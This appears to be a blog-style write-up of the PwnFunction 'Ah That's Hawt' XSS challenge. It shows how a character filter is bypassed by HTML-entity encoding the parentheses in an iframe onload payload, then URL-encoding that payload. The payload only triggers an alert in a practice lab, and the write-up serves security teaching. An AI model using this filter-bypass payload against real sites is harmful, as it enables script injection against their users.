Ah That’s Hawt PwnFunction XSS Solution

Ah That’s Hawt is an easy level too, but it will teach you about encoding and how to pass data in a different form that we’re used to, so let’s start.

First, we need to analyze the code

Ah That’s Hawt PwnFunction Code

just like the previous levels , we have a value that passed with “GET” parameter that is called “markassbrownlee”.

then the these characters will be removed from the value, the characters that’ll be removed are “[(`)\]”, so we can’t use ‘alert(1)’ in that form, neither we can close our javascript tag </script>

so, what can we do, well there’s something called HTML encoding (HTML entity not HTML URL encoding) that is not filtered by the code implemented, so we will use that technique.

You can use the following site for easier encoding rather than doing each character alone.

and now we can write what we want, we can use <iframe> tag since it’s allowed inside h2 tag, so let’s write the following into the encoding site

<iframe onload=alert(1337)>

Please note that we will only encode the left and right paranthesis since they’re the ones filtered

<iframe onload=alert&#40;1337&#41;>

now if you try, you will see that it doesn’t work and not everything is being passed ( because # and & are special characters where # means an id in the HTML document and & means another parameters to pass), so let’s encode the parameter with HTML URL Encoding ( you can do it from the previous site by using a chain option ).

and you should get the following

<iframe onload=alert%26%2340%3b1337%26%2341%3b>

and that would be it for Ah That’s Hawt PwnFunction level, hope you got something new out of this post.